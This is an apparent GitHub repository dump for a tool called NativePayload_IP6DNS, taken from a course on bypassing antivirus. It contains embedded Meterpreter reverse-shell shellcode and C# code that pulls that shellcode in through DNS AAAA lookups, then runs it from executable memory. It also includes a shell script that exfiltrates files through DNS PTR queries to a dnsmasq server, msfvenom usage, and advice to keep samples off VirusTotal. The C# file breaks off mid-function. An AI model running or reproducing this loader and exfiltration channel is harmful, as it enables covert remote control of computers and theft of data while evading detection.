├── NativePayload_IP6DNS.png ├── Chapter 6 - DATA Transferring Technique by DNS Traffic - AAAA Records ├── Pics │ ├── NativePayload_IP6DNS-Via-IPv6-AAAA.png │ ├── NativePayload_IP6DNS-Via-IPv6-PTR.png │ └── README.md ├── README.md └── NativePayload_IP6DNS.sh ├── README.md └── NativePayload_IP6DNS.cs /NativePayload_IP6DNS.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DamonMohammadbagher/NativePayload_IP6DNS/HEAD/NativePayload_IP6DNS.png -------------------------------------------------------------------------------- /Chapter 6 - DATA Transferring Technique by DNS Traffic - AAAA Records/Pics/NativePayload_IP6DNS-Via-IPv6-AAAA.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DamonMohammadbagher/NativePayload_IP6DNS/HEAD/Chapter 6 - DATA Transferring Technique by DNS Traffic - AAAA Records/Pics/NativePayload_IP6DNS-Via-IPv6-AAAA.png -------------------------------------------------------------------------------- /Chapter 6 - DATA Transferring Technique by DNS Traffic - AAAA Records/Pics/NativePayload_IP6DNS-Via-IPv6-PTR.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DamonMohammadbagher/NativePayload_IP6DNS/HEAD/Chapter 6 - DATA Transferring Technique by DNS Traffic - AAAA Records/Pics/NativePayload_IP6DNS-Via-IPv6-PTR.png -------------------------------------------------------------------------------- /Chapter 6 - DATA Transferring Technique by DNS Traffic - AAAA Records/Pics/README.md: -------------------------------------------------------------------------------- 1 | # Pictures for two syntaxes : 2 | 3 | for more information about AAAA records you read Chapter 6 and for more information about IPv6 PTR records you can read Chapter 7 4 | 5 | Example A-Step1: (Server Side ) ./NativePayload_IP6DNS.sh -r 6 | 7 | Example A-Step2: (Client Side ) 
./NativePayload_IP6DNS.sh -u text.txt DNSMASQ_IPv4 [delay] (sec) [address] xxxx:xxxx 8 | 9 | example IPv4:192.168.56.110 : ./NativePayload_IP6DNS.sh -r 10 | 11 | example IPv4:192.168.56.111 : ./NativePayload_IP6DNS.sh -u text.txt 192.168.56.110 delay 0 address fe81:2222 12 | 13 | Description: with A-Step1 you will set up a DNS server , with A-Step2 you can send a text file via IPv6 PTR Queries to the DNS server 14 | 15 | Example B-Step1: (Server Side ) ./NativePayload_IP6DNS.sh -d makedns test.txt mydomain.com [address] xxxx:xxxx 16 | 17 | Example B-Step2: (Client Side ) ./NativePayload_IP6DNS.sh -d getdata mydomain.com DNSMASQ_IPv4 18 | 19 | example IPv4:192.168.56.110 : ./NativePayload_IP6DNS.sh -d makedns text.txt google.com address fe80:1234 20 | 21 | example IPv4:192.168.56.111 : ./NativePayload_IP6DNS.sh -d getdata google.com 192.168.56.110 22 | 23 | Description: with B-Step1 you will have a DNS server , with B-Step2 you can dump the test.txt file from the server via an IPv6 AAAA record Query 24 | -------------------------------------------------------------------------------- /Chapter 6 - DATA Transferring Technique by DNS Traffic - AAAA Records/README.md: -------------------------------------------------------------------------------- 1 | # Course : Bypassing Anti Viruses by C#.NET Programming 2 | 3 | Part 2 (Infil/Exfiltration/Transferring Techniques by C#) , Chapter 6 : DATA Transferring Technique by DNS Traffic (AAAA Records) 4 | 5 | eBook : Bypassing Anti Viruses by C#.NET Programming 6 | 7 | eBook chapter 4 , PDF Download : https://github.com/DamonMohammadbagher/eBook-BypassingAVsByCSharp/tree/master/CH6 8 | 9 | Related Video : 10 | 11 | Video 2 for chapter 6: https://www.youtube.com/watch?v=Ac651MbNJ_U 12 | 13 | Video 1 for chapter 7: https://www.youtube.com/watch?v=9jiry5b-oPo 14 | 15 | Video 2 for chapter 7: https://www.youtube.com/watch?v=6Lj-2KkHqgA 16 | 17 | Warning :Don't Use "www.virustotal.com" or something like that , Never Ever ;D 18 | 19 | Recommended: 20 | 21 | 
STEP 1 : Use each AV one by one in your LAB . 22 | 23 | STEP 2 : after "AV Signature Database Updated" your Internet Connection should be "Disconnect" . 24 | 25 | STEP 3 : Now you can Copy and Paste your C# code to your Virtual Machine for test . 26 | 27 | # NativePayload_IP6DNS.sh help : 28 | 29 | Example A-Step1: (Server Side ) ./NativePayload_IP6DNS.sh -r 30 | 31 | Example A-Step2: (Client Side ) ./NativePayload_IP6DNS.sh -u text.txt DNSMASQ_IPv4 [delay] (sec) [address] xxxx:xxxx 32 | 33 | example IPv4:192.168.56.110 : ./NativePayload_IP6DNS.sh -r 34 | 35 | example IPv4:192.168.56.111 : ./NativePayload_IP6DNS.sh -u text.txt 192.168.56.110 delay 0 address fe81:2222 36 | 37 | Description: with A-Step1 you will set up a DNS server , with A-Step2 you can send a text file via IPv6 PTR Queries to the DNS server 38 | 39 | # Using IPv6 PTR Queries for Exfil/Upload DATA 40 | 41 | ![](https://github.com/DamonMohammadbagher/NativePayload_IP6DNS/blob/master/Chapter%206%20-%20DATA%20Transferring%20Technique%20by%20DNS%20Traffic%20-%20AAAA%20Records/Pics/NativePayload_IP6DNS-Via-IPv6-PTR.png) 42 | 43 | Example B-Step1: (Server Side ) ./NativePayload_IP6DNS.sh -d makedns test.txt mydomain.com [address] xxxx:xxxx 44 | 45 | Example B-Step2: (Client Side ) ./NativePayload_IP6DNS.sh -d getdata mydomain.com DNSMASQ_IPv4 46 | 47 | example IPv4:192.168.56.110 : ./NativePayload_IP6DNS.sh -d makedns text.txt google.com address fe80:1234 48 | 49 | example IPv4:192.168.56.111 : ./NativePayload_IP6DNS.sh -d getdata google.com 192.168.56.110 50 | 51 | Description: with B-Step1 you will have a DNS server , with B-Step2 you can dump the test.txt file from the server via an IPv6 AAAA record Query 52 | 53 | # Using IPv6 AAAA Records for Infil/Download DATA 54 | 55 | ![](https://github.com/DamonMohammadbagher/NativePayload_IP6DNS/blob/master/Chapter%206%20-%20DATA%20Transferring%20Technique%20by%20DNS%20Traffic%20-%20AAAA%20Records/Pics/NativePayload_IP6DNS-Via-IPv6-AAAA.png) 56 | 57 | 
-------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # NativePayload_IP6DNS 2 | Published by Damon Mohammadbagher 3 | 4 | this tool works like NativePayload_DNS , but in this case it works with IPv6 Addresses and AAAA records for Transferring Backdoor payloads by DNS Traffic ;) 5 | 6 | 7 | note : this code supports only 990 bytes of payload (99 IPV6 ADDRESS lines , 10 bytes each) ; to change this value you have to change the source code 8 | 9 | note : {fe80:1111:}{fc48:83e4:f0e8:cc00:0000}{:ae0} {test.domain.com} 10 | 11 | note : 10 bytes Payload ==> {fc48:83e4:f0e8:cc00:0000} and {:ae0} is the payload counter or ID 12 | 13 | 14 | Example: msfvenum --arch x86_64 --platform windows -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.113 -f c > /payload_string.txt 15 | 16 | Replace your Payload_strings.txt file from "\0xfc\0x48\0x83..." to "fc4883..." 17 | 18 | syntax 1 : NativePayload_IP6DNS.exe null "payload string" 19 | 20 | Description 1 : Making Hosts files for a Linux Dns Server Like the Dnsmasq or dnsspoof tools , copy the output of this command to the DNS Hosts file in linux 21 | you can use the Msfvenom tool like the example and copy your payload in "payload string" 22 | 23 | Example : payload string ==> fc4883e4f0e8cc000000415141505251564831d2ae1 24 | 25 | Example: NativePayload_IP6DNS.exe null "payload string" > /dnsmasq.hosts 26 | 27 | after this command you have something like these lines in your Hosts file : 28 | 29 | Example : /etc/dnsmasq.hosts or /etc/hosts (depending on your configuration for the dnsmasq or dnsspoof tools) 30 | 31 | fe80:1111:fc48:83e4:f0e8:cc00:0000:ae0 test.domain.com 32 | 33 | fe80:1111:4151:4150:5251:5648:31d2:ae1 test.domain.com 34 | 35 | fe80:1111:6548:8b52:6048:8b52:1848:ae2 test.domain.com 36 | 37 | fe80:1111:8b52:2048:8b72:5048:0fb7:ae3 test.domain.com 38 | 39 | fe80:1111:4a4a:4d31:c948:31c0:ac3c:ae4 test.domain.com 40 | 
41 | fe80:1111:617c:022c:2041:c1c9:0d41:ae5 test.domain.com 42 | 43 | . 44 | 45 | . 46 | 47 | . 48 | 49 | fe80:1111:85f6:75b4:41ff:e758:6a00:ae49 test.domain.com 50 | 51 | fe80:1111:5949:c7c2:f0b5:a256:ffd5:ae50 test.domain.com 52 | 53 | 54 | 55 | 56 | 57 | syntax 2 : NativePayload_IP6DNS.exe Payload 58 | 59 | description 2 : this switch is for making sample payload for your hosts file 60 | 61 | 62 | syntax 3 : NativePayload_IP6DNS.exe "FQDN" "Fake_DNS_Server" 63 | 64 | description 3 : after making your payloads and copy that in your fake_DNS_Server by dnsmasq or dnsspoof and starting fakeDNSServer , now you can start transferring your Payloads From FakeDNSServer to your Infected system by NativePayload_IP6DNS.exe tool 65 | 66 | Example : NativePayload_IP6DNS.exe test.domain.com 192.168.1.113 67 | 68 | note : in this case 192.168.1.113 is your FakeDNSServer also this is your Metasploit: Meterpreter/Listener. 69 | 70 | you should have meterpreter session after 1 DNS Response from FakeDNSserver to Client (Backdoor system) 71 | 72 | Article : Transferring Backdoor Payloads by DNS AAAA records and IPv6 Address: 73 | 74 | link 0: https://www.linkedin.com/pulse/transferring-backdoor-payloads-dns-aaaa-records-ipv6-mohammadbagher 75 | 76 | link 1: https://www.peerlyst.com/posts/transferring-backdoor-payloads-by-dns-aaaa-records-and-ipv6-address-damon-mohammadbagher 77 | 78 |

79 | 80 | -------------------------------------------------------------------------------- /Chapter 6 - DATA Transferring Technique by DNS Traffic - AAAA Records/NativePayload_IP6DNS.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | echo 3 | echo "NativePayload_IP6DNS.sh , Published by Damon Mohammadbagher 2017-2018" 4 | echo "Injecting/Downloading/Uploading DATA to DNS Traffic via IPv6 DNS AAAA/PTR Records" 5 | echo "help syntax: ./NativePayload_IP6DNS.sh help" 6 | echo 7 | if [ $1 == "help" ] 8 | then 9 | tput setaf 2; 10 | echo 11 | echo "Example A-Step1: (Server Side ) ./NativePayload_IP6DNS.sh -r" 12 | echo "Example A-Step2: (Client Side ) ./NativePayload_IP6DNS.sh -u text.txt DNSMASQ_IPv4 [delay] (sec) [address] xxxx:xxxx" 13 | echo "example IPv4:192.168.56.110 : ./NativePayload_IP6DNS.sh -r" 14 | echo "example IPv4:192.168.56.111 : ./NativePayload_IP6DNS.sh -u text.txt 192.168.56.110 delay 0 address fe81:2222" 15 | echo "Description: with A-Step1 you will make DNS Server , with A-Step2 you can Send text file via IPv6 PTR Queries to DNS server" 16 | echo 17 | echo "Example B-Step1: (Server Side ) ./NativePayload_IP6DNS.sh -d makedns test.txt mydomain.com [address] xxxx:xxxx" 18 | echo "Example B-Step2: (Client Side ) ./NativePayload_IP6DNS.sh -d getdata mydomain.com DNSMASQ_IPv4" 19 | echo "example IPv4:192.168.56.110 : ./NativePayload_IP6DNS.sh -d makedns text.txt google.com address fe80:1234" 20 | echo "example IPv4:192.168.56.111 : ./NativePayload_IP6DNS.sh -d getdata google.com 192.168.56.110" 21 | echo "Description: with B-Step1 you will have DNS Server , with B-Step2 you can Dump test.txt file from server via IPv6 AAAA record Query" 22 | echo 23 | fi 24 | 25 | # uploading data via PTR queries (Client Side "A") 26 | if [ $1 == "-u" ] 27 | then 28 | ########### 29 | DefAddr="fe80:1111" 30 | if [ $6 == "address" ] 31 | then 32 | DefAddr=$7 33 | elif [ $6 == null ] 34 | then 35 | DefAddr="fe80:1111" 36 | 
fi 37 | delaytime=0 38 | if [ $4 == "delay" ] 39 | then 40 | delaytime=$5 41 | elif [ $4 == null ] 42 | then 43 | delaytime=0 44 | fi 45 | 46 | c=0 47 | octets="" 48 | tput setaf 9; 49 | #echo " " > DnsHost.txt 50 | #echo " " > TempDnsHost.txt 51 | RecordsIDcounter=0 52 | IPv6Oct=0 53 | counts=0 54 | echo 55 | tput setaf 9; 56 | echo "[!] [Exfil/Uploading DATA] via IPv6 DNS PTR Record Queries" 57 | echo "[!] Sending DNS Lookup to DNS Server: " $3 58 | echo "[!] Sending DNS Lookup by Delay (sec): " $delaytime 59 | tput setaf 2; 60 | echo 61 | for op in `xxd -p -c 1 $2`; do 62 | 63 | #echo "[!] injecting this text via IPv6 octet:" "`echo $op | xxd -r -p`" " ==byte==> " $op 64 | 65 | if (($IPv6Oct == 0)) 66 | then 67 | octets+=$op 68 | ((IPv6Oct++)) 69 | elif (($IPv6Oct == 1)) 70 | then 71 | octets+=$op":" 72 | IPv6Oct=0 73 | #debug only 74 | #echo "[!] injecting this text via IPv6 octet:" "`echo $octets | xxd -r -p`" " ==byte==> " $octets 75 | #debug only 76 | fi 77 | ((c++)) 78 | if(($c == 12)) 79 | then 80 | tput setaf 2; 81 | echo -------------------------- 82 | tput setaf 3; 83 | echo "[!] Your IPv6 is : " $DefAddr:"${octets::-1}" 84 | Data="${octets::-1}" 85 | tput setaf 6; 86 | echo "[!] Your Text/Data for this IPv6 is : " `echo $Data | xxd -r -p ` 87 | #echo $DefAddr:"${octets::-1}":$RecordsIDcounter $4 >> TempDnsHost.txt 88 | time=`date '+%d/%m/%y %H:%M:%S'` 89 | tput setaf 9; 90 | echo "[>] [$counts] [$time] Sending Text/Data via Nslookup Done" 91 | MyIPv6address=$DefAddr:"${octets::-1}" 92 | nslookup -type=aaaa $MyIPv6address $3 | grep arpa 93 | tput setaf 2; 94 | ((counts++)) 95 | sleep $delaytime 96 | tput setaf 9; 97 | octets="" 98 | c=0 99 | ((RecordsIDcounter++)) 100 | else 101 | tput setaf 9; 102 | fi 103 | 104 | if(($RecordsIDcounter == 9999)) 105 | then 106 | echo "[!] 
Oops Your IPv6 counter (z) was upper than 9999 : " "${octets::-1}".$RecordsIDcounter 107 | break 108 | fi 109 | done 110 | ######### 111 | 112 | tput setaf 2; 113 | echo 114 | echo "[!] Sending Done by ($counts) Request." 115 | echo 116 | tput setaf 9; 117 | 118 | fi 119 | 120 | # download data via AAAA records queries 121 | if [ $1 == "-d" ] 122 | then 123 | 124 | # Syntax : NativePayload_IP6DNS.sh -d getdata domain_name DnsMasq_IPv4" (CLIENT SIDE "B") 125 | if [ $2 == "getdata" ] 126 | then 127 | 128 | tput setaf 9; 129 | echo "[!] Downloading Mode , Dump Text DATA via DNS IPv6 AAAA Records " 130 | tput setaf 2; 131 | echo "[!] Sending DNS A Records Queries for Domain :" $3 "to DNSMASQ-Server:" $4 132 | echo "[!] to dump test.txt file via AAAA records you should use this syntax in server side:" 133 | tput setaf 9; 134 | echo "[!] Syntax : NativePayload_IP6DNS.sh -d makedns test.txt google.com" 135 | 136 | # old ver : nslookup -type=aaaa google.com 127.0.0.1 | grep AAAA | awk {'print $5'} | sort -t: -k 8 -n 137 | PayloadLookups=`nslookup -type=aaaa $3 $4 | grep AAAA | awk {'print $5'} | sort -t: -k 8 -n` 138 | 139 | # new ver : for some versions of nslookup you need this syntax 140 | if (( `echo ${#PayloadLookups}` == 0 )) 141 | then 142 | PayloadLookups=`nslookup -type=aaaa $3 $4 | grep Address: | awk {'print $2'} | sort -t: -k 8 -n` 143 | tput setaf 9; 144 | echo "[>] Warning , Nslookup Result via [grep AAAA] was null , Sending request again via [grep Address:]" 145 | echo "[!] 
Warning , it means Nslookup query sent (2) times" 146 | fi 147 | 148 | tput setaf 9; 149 | echo "[>] Dumped this Text via DNS AAAA Record Query:" 150 | echo 151 | AAAARecordscounter=0 152 | 153 | for op in $PayloadLookups; do 154 | if [[ $op != *"#53"* ]]; 155 | then 156 | Lookups+=`echo $op | cut -d':' -f3` 157 | Lookups+=`echo $op | cut -d':' -f4` 158 | Lookups+=`echo $op | cut -d':' -f5` 159 | Lookups+=`echo $op | cut -d':' -f6` 160 | Lookups+=`echo $op | cut -d':' -f7` 161 | echo $Lookups | xxd -r -p 162 | Lookups="" 163 | ((AAAARecordscounter++)) 164 | fi 165 | done 166 | 167 | echo 168 | echo 169 | tput setaf 2; 170 | echo "[!] Dumping Done , Performed by" $((AAAARecordscounter)) "DNS AAAA Records for domain :" $3 "from Server:" $4 171 | echo 172 | fi 173 | 174 | # Creating DNS Server and DNSHOST.TXT file (SERVER SIDE "B") 175 | # NativePayload_IP6DNS.sh -d makedns text-file mydomain.com address fe80:1111 176 | if [ $2 == "makedns" ] 177 | then 178 | DefAddr="fe80:1111" 179 | if [ $5 == "address" ] 180 | then 181 | DefAddr=$6 182 | elif [ $5 == null ] 183 | then 184 | DefAddr="fe80:1111" 185 | fi 186 | c=0 187 | octets="" 188 | tput setaf 9; 189 | echo " " > DnsHost.txt 190 | echo " " > TempDnsHost.txt 191 | RecordsIDcounter=0 192 | IPv6Oct=0 193 | 194 | for op in `xxd -p -c 1 $3`; do 195 | 196 | #echo "[!] injecting this text via IPv6 octet:" "`echo $op | xxd -r -p`" " ==byte==> " $op 197 | 198 | if (($IPv6Oct == 0)) 199 | then 200 | octets+=$op 201 | ((IPv6Oct++)) 202 | elif (($IPv6Oct == 1)) 203 | then 204 | octets+=$op":" 205 | IPv6Oct=0 206 | # debug only 207 | #echo "[!] injecting this text via IPv6 octet:" "`echo $octets | xxd -r -p`" " ==byte==> " $octets 208 | # debug only 209 | 210 | fi 211 | ((c++)) 212 | if(($c == 10)) 213 | then 214 | tput setaf 9; 215 | 216 | echo "[!] injecting this text via IPv6 Address (10bytes) :" "`echo $octets | xxd -r -p`" " ==byte==> " $octets 217 | tput setaf 3; 218 | echo "[!] 
Your IPv6 is : " $DefAddr:"${octets::-1}":$RecordsIDcounter 219 | Data="${octets::-1}" 220 | echo "[!] Your Text/Data for this IPv6 is : " `echo $Data | xxd -r -p ` 221 | echo ------------------------- 222 | echo $DefAddr:"${octets::-1}":$RecordsIDcounter $4 >> TempDnsHost.txt 223 | tput setaf 9; 224 | octets="" 225 | c=0 226 | ((RecordsIDcounter++)) 227 | else 228 | tput setaf 9; 229 | fi 230 | 231 | if(($RecordsIDcounter == 9999)) 232 | then 233 | echo "[!] Oops Your IPv6 counter (z) was upper than 9999 : " "${octets::-1}".$RecordsIDcounter 234 | break 235 | fi 236 | done 237 | 238 | echo 239 | tput setaf 2; 240 | echo "[!] DnsHost.txt Created by" $RecordsIDcounter "AAAA Records for Domain:" $4 241 | echo "[!] you can use this DNSHOST.TXT file via Dnsmasq tool" 242 | tput setaf 2; 243 | echo "[!] to dump these AAAA records you should use this syntax in client side:" 244 | tput setaf 9; 245 | echo "[!] Syntax : NativePayload_IP6DNS.sh -d getdata domain_name DnsMasq_IPv4" 246 | echo 247 | echo "[>] DNSMASQ Started by DNSHOST.TXT File" 248 | echo 249 | tput setaf 9; 250 | # sort by -k4 : wxyz:wxyz:xxxx:XXXX:x:x:x:z 251 | cat TempDnsHost.txt | sort -t: -k4 -n > DnsHost.txt 252 | `dnsmasq --no-hosts --no-daemon --log-queries -H DnsHost.txt` 253 | tput setaf 9; 254 | 255 | 256 | fi 257 | 258 | fi 259 | 260 | # make DNS Server for Dump DATA via DNS PTR Queries (Server Side "A") 261 | # Reading Mode (log data via dnsmasq log files) 262 | if [ $1 == "-r" ] 263 | then 264 | tput setaf 9; 265 | echo "[>] Reading Mode , DNSMASQ Started by this log file : /var/log/dnsmasq.log !" 
266 | tput setaf 2; 267 | echo "" > /var/log/dnsmasq.log 268 | `dnsmasq --no-hosts --no-daemon --log-queries --log-facility=/var/log/dnsmasq.log` & 269 | filename="/var/log/dnsmasq.log" 270 | fs=$(stat -c%s "$filename") 271 | count=0 272 | while true; do 273 | tput setaf 2; 274 | sleep 10 275 | fs2=$(stat -c%s "$filename") 276 | if [ "$fs" != "$fs2" ] ; 277 | then 278 | 279 | tput setaf 6; 280 | echo "[!] /var/log/dnsmasq.log File has changed!" 281 | echo "[!] Checking Queries" 282 | fs=$(stat -c%s "$filename") 283 | fs2=$(stat -c%s "$filename") 284 | 285 | IP6PTRecordsTemp=`cat $filename | grep PTR | awk {'print $6'} | tr -d '.'` 286 | time=`date '+%d/%m/%y %H:%M:%S'` 287 | echo "[!] ["$time"] Dump this Text via IPv6 PTR Queries" 288 | 289 | tput setaf 9; 290 | Dumptext="" 291 | for ops1 in `echo $IP6PTRecordsTemp`; do 292 | 293 | IP6PTRecords=`echo "${ops1::-15}" | rev` 294 | 295 | echo $IP6PTRecords | xxd -r -p 296 | Dumptext+=`echo $IP6PTRecords | xxd -r -p` 297 | done 298 | echo 299 | tput setaf 6; 300 | echo "[>] this Text Saved to ExfilDump.txt" 301 | echo $Dumptext > ExfilDump.txt 302 | tput setaf 2; 303 | else 304 | fs=$(stat -c%s "$filename") 305 | fs2=$(stat -c%s "$filename") 306 | tput setaf 2; 307 | fi 308 | done 309 | fi 310 | -------------------------------------------------------------------------------- /NativePayload_IP6DNS.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Linq; 4 | using System.Text; 5 | using System.Net; 6 | using System.Diagnostics; 7 | using System.Data; 8 | using System.Runtime.InteropServices; 9 | 10 | namespace NativePayload_IP6DNS 11 | { 12 | class Program 13 | { 14 | static string payload = "fc4883e4f0e8cc0000004151415052" 15 | + "51564831d265488b5260488b521848" 16 | + "8b5220488b7250480fb74a4a4d31c9" 17 | + "4831c0ac3c617c022c2041c1c90d41" 18 | + "01c1e2ed524151488b52208b423c48" 19 | + 
"01d0668178180b020f85720000008b" 20 | + "80880000004885c074674801d0508b" 21 | + "4818448b40204901d0e35648ffc941" 22 | + "8b34884801d64d31c94831c0ac41c1" 23 | + "c90d4101c138e075f14c034c240845" 24 | + "39d175d858448b40244901d066418b" 25 | + "0c48448b401c4901d0418b04884801" 26 | + "d0415841585e595a41584159415a48" 27 | + "83ec204152ffe05841595a488b12e9" 28 | + "4bffffff5d49be7773325f33320000" 29 | + "41564989e64881eca00100004989e5" 30 | + "49bc0200115cc0a8013241544989e4" 31 | + "4c89f141ba4c772607ffd54c89ea68" 32 | + "010100005941ba29806b00ffd56a05" 33 | + "415e50504d31c94d31c048ffc04889" 34 | + "c248ffc04889c141baea0fdfe0ffd5" 35 | + "4889c76a1041584c89e24889f941ba" 36 | + "99a57461ffd585c0740a49ffce75e5" 37 | + "e8930000004883ec104889e24d31c9" 38 | + "6a0441584889f941ba02d9c85fffd5" 39 | + "83f8007e554883c4205e89f66a4041" 40 | + "59680010000041584889f24831c941" 41 | + "ba58a453e5ffd54889c34989c74d31" 42 | + "c94989f04889da4889f941ba02d9c8" 43 | + "5fffd583f8007d2858415759680040" 44 | + "000041586a005a41ba0b2f0f30ffd5" 45 | + "575941ba756e4d61ffd549ffcee93c" 46 | + "ffffff4801c34829c64885f675b441" 47 | + "ffe7586a005949c7c2f0b5a256ffd5"; 48 | 49 | public static DataTable _IPV6_IPAddress_Payloads; 50 | 51 | static void Main(string[] args) 52 | { 53 | 54 | try 55 | { 56 | _IPV6_IPAddress_Payloads = new DataTable(); 57 | 58 | _IPV6_IPAddress_Payloads.Columns.Add("Pay_id", typeof(int)); 59 | _IPV6_IPAddress_Payloads.Columns.Add("Payload", typeof(string)); 60 | _IPV6_IPAddress_Payloads.DefaultView.Sort = "Pay_id"; 61 | _IPV6_IPAddress_Payloads.DefaultView.ToTable("Pay_id"); 62 | 63 | Console.ForegroundColor = ConsoleColor.DarkYellow; 64 | Console.WriteLine(); 65 | Console.WriteLine("NativePayload_IPv6DNS tool Published by Damon Mohammadbagher"); 66 | Console.ForegroundColor = ConsoleColor.Green; 67 | Console.WriteLine("Transferring Backdoor Payloads by IPv6_Address and DNS traffic ;)"); 68 | Console.ForegroundColor = ConsoleColor.Gray; 69 | if (args[0].ToUpper() == 
"PAYLOAD") 70 | { 71 | Console.WriteLine("Note this code supported only 99 * 10 = 990 bytes payload "); 72 | Console.WriteLine("Note this code supported only 99 lines foreach 10 bytes payload \n"); 73 | 74 | int c = 0; 75 | int counter = 0; 76 | int b = 0; 77 | string temp = ""; 78 | foreach (char item in payload) 79 | { 80 | if (c >= 3) 81 | { temp += item + ":"; c = 0; } 82 | else if (c <= 4) { temp += item; c++; } 83 | 84 | b++; 85 | 86 | if (b >= 20) 87 | { 88 | 89 | if (counter <= 99) 90 | { 91 | Console.Write("fe80:" + "1111:" + temp + "ae" + counter); 92 | } 93 | else if (counter >= 100) 94 | { 95 | Console.Write("fe80:" + "1111:" + temp + "a" + counter); 96 | } 97 | else if (counter >= 999) 98 | { 99 | Console.Write("fe80:" + "1111:" + temp + "" + counter); 100 | } 101 | Console.WriteLine(""); b = 0; 102 | temp = ""; 103 | counter++; 104 | } 105 | 106 | } 107 | 108 | }else if (args[0].ToUpper() == "NULL") 109 | { 110 | Console.WriteLine("Note this code supported only 99 * 10 = 990 bytes payload "); 111 | Console.WriteLine("Note this code supported only 99 lines foreach 10 bytes payload \n"); 112 | 113 | payload = args[1]; 114 | int c = 0; 115 | int counter = 0; 116 | int b = 0; 117 | string temp = ""; 118 | foreach (char item in payload) 119 | { 120 | if (c >= 3) 121 | { temp += item + ":"; c = 0; } 122 | else if (c <= 4) { temp += item; c++; } 123 | 124 | b++; 125 | 126 | if (b >= 20) 127 | { 128 | 129 | if (counter <= 99) 130 | { 131 | Console.Write("fe80:" + "1111:" + temp + "ae" + counter); 132 | } 133 | else if (counter >= 100) 134 | { 135 | Console.Write("fe80:" + "1111:" + temp + "a" + counter); 136 | } 137 | else if (counter >= 999) 138 | { 139 | Console.Write("fe80:" + "1111:" + temp + "" + counter); 140 | } 141 | Console.WriteLine(""); b = 0; 142 | temp = ""; 143 | counter++; 144 | } 145 | 146 | } 147 | 148 | } 149 | else 150 | { 151 | try 152 | { 153 | __nslookup(args[0], args[1]); 154 | 155 | Exploit(_IPV6_IPAddress_Payloads); 156 | } 157 | 
catch (Exception exp) 158 | { 159 | Console.WriteLine("Main exploit : " + exp.Message); 160 | } 161 | } 162 | 163 | } 164 | catch (Exception main) 165 | { 166 | Console.WriteLine("Main : " + main.Message); 167 | } 168 | 169 | } 170 | 171 | static void Exploit(DataTable payloads) 172 | { 173 | string ss = ""; 174 | byte[] __Bytes = new byte[payloads.Rows.Count * 2]; 175 | for (int i = 0; i < payloads.Rows.Count; i++) 176 | { 177 | try 178 | { 179 | // with Round-robin this code was necessary to sort payloads ;) 180 | EnumerableRowCollection filter = payloads.AsEnumerable().Where(r => r.Field("Pay_id") == i); 181 | foreach (DataRow item in filter) 182 | { 183 | ss += item.ItemArray[1].ToString(); 184 | } 185 | } 186 | catch (Exception) 187 | { 188 | 189 | 190 | } 191 | } 192 | try 193 | { 194 | Console.Write(""); 195 | int Oonagi = payloads.Rows.Count * 2; 196 | int t = 0; 197 | for (int k = 0; k < Oonagi; k++) 198 | { 199 | string _tmp1 = ss.Substring(t, 2); 200 | byte current1 = Convert.ToByte(_tmp1, 16); 201 | // debug only , print payload string 202 | Console.Write(_tmp1); 203 | __Bytes[k] = current1; 204 | t++; 205 | t++; 206 | 207 | } 208 | 209 | Console.WriteLine(); 210 | Console.ForegroundColor = ConsoleColor.Gray; 211 | Console.WriteLine("Bingo Meterpreter session by IPv6_Address and DNS traffic ;)"); 212 | Console.WriteLine("DNS Round-Robin Supported"); 213 | UInt32 funcAddr = VirtualAlloc(0, (UInt32)__Bytes.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE); 214 | Marshal.Copy(__Bytes, 0, (IntPtr)(funcAddr), __Bytes.Length); 215 | IntPtr hThread = IntPtr.Zero; 216 | UInt32 threadId = 0; 217 | IntPtr pinfo = IntPtr.Zero; 218 | 219 | hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId); 220 | WaitForSingleObject(hThread, 0xFFFFFFFF); 221 | } 222 | catch (Exception ops1) 223 | { 224 | 225 | Console.WriteLine("Exploit: " + ops1.Message); 226 | } 227 | } 228 | 229 | public static void __nslookup(string DNS_AAAA_A, string DnsServer) 230 | { 231 | 232 | int 
breakpoint_1 = 0; 233 | string last_octet_tmp = ""; 234 | 235 | /// Length for injected payloads by IPv6 Addresss 236 | int Final_payload_count = 0; 237 | 238 | try 239 | { 240 | 241 | /// Make DNS traffic for getting Meterpreter Payloads by nslookup 242 | ProcessStartInfo ns_Prcs_info = new ProcessStartInfo("nslookup.exe", DNS_AAAA_A + " " + DnsServer); 243 | ns_Prcs_info.RedirectStandardInput = true; 244 | ns_Prcs_info.RedirectStandardOutput = true; 245 | ns_Prcs_info.UseShellExecute = false; 246 | /// you can use Thread Sleep here 247 | 248 | Process nslookup = new Process(); 249 | nslookup.StartInfo = ns_Prcs_info; 250 | nslookup.StartInfo.WindowStyle = ProcessWindowStyle.Hidden; 251 | nslookup.Start(); 252 | 253 | string result_Line0 = ""; 254 | string computerList = nslookup.StandardOutput.ReadToEnd(); 255 | string[] All_lines = computerList.Split('\t', 'n'); 256 | int PayloadLines_current_id = 0; 257 | 258 | 259 | 260 | /// Getting First Line of Meterpreter Payload Lines ;) 261 | /// Getting First Line of Meterpreter Payload Lines ;) 262 | try 263 | { 264 | for (int x = 0; x < All_lines.Length; x++) 265 | { 266 | Console.ForegroundColor = ConsoleColor.DarkGreen; 267 | if (All_lines[x].ToUpper().Contains("ADDRESSES:")) 268 | { 269 | /// Getting First Line of Meterpreter Payload Lines ;) 270 | int f = All_lines[x].IndexOf("Addresses: ") + "Addresses: ".Length; 271 | int l = All_lines[x].LastIndexOf("\r\n"); 272 | result_Line0 = All_lines[x].Substring(f, l - f); 273 | breakpoint_1 = x; 274 | break; 275 | } 276 | 277 | 278 | } 279 | Console.WriteLine(); 280 | // Debug only {show address line 0} 281 | //Console.Write(result_Line0); 282 | Console.WriteLine(); 283 | /// normalize Address 0:0:0 ==> 0000:0000:0000 284 | /// normalize Address 0:0:0 ==> 0000:0000:0000 285 | string[] temp_normalize0 = result_Line0.Split(':'); 286 | 287 | /// finding hidden zero in address octets ;) 288 | for (int ix = 0; ix < temp_normalize0.Length; ix++) 289 | { 290 | int count = 
